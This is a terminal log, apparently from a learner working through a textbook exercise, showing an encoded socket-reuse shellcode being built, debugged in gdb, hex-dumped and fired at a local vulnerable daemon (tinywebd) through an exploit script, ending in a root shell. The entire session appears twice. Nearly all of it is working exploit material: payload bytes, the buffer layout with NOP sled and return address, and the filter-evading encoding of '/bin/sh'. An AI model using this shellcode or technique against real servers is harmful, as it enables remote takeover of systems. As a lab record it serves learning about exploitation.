root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000  2f 62 69 6e 2f 73 68 0a                           |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..

Das andere Terminal könnt ihr ja vom Buch übernehmen.

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push   0x8
   0xbffff60d: pop    edx
   0xbffff60e: sub    BYTE PTR [ebx+edx*1],0x5
   0xbffff612: dec    edx
   0xbffff613: jns    0xbffff60e
   0xbffff615: int3  
   0xbffff616: xor    edx,edx
   0xbffff618: push   edx
   0xbffff619: mov    edx,esp
   0xbffff61b: push   ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
42c42
< int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 4c 8b  1a 6a 02 59 31 c0 b0 3f  |....T$L..j.Y1..?|
00000020  cd 80 49 79 f9 b0 0b 68  34 78 6d 05 68 34 67 6e  |..Iy...h4xm.h4gn|
00000030  73 89 e3 6a 08 5a 80 2c  13 05 4a 79 f9 31 d2 52  |s..j.Z.,..Jy.1.R|
00000040  89 e2 53 89 e1 cd 80                              |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000  2f 62 69 6e 2f 73 68 0a                           |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..

Das andere Terminal könnt ihr ja vom Buch übernehmen.

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push   0x8
   0xbffff60d: pop    edx
   0xbffff60e: sub    BYTE PTR [ebx+edx*1],0x5
   0xbffff612: dec    edx
   0xbffff613: jns    0xbffff60e
   0xbffff615: int3  
   0xbffff616: xor    edx,edx
   0xbffff618: push   edx
   0xbffff619: mov    edx,esp
   0xbffff61b: push   ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
42c42
< int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 4c 8b  1a 6a 02 59 31 c0 b0 3f  |....T$L..j.Y1..?|
00000020  cd 80 49 79 f9 b0 0b 68  34 78 6d 05 68 34 67 6e  |..Iy...h4xm.h4gn|
00000030  73 89 e3 6a 08 5a 80 2c  13 05 4a 79 f9 31 d2 52  |s..j.Z.,..Jy.1.R|
00000040  89 e2 53 89 e1 cd 80                              |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root

   
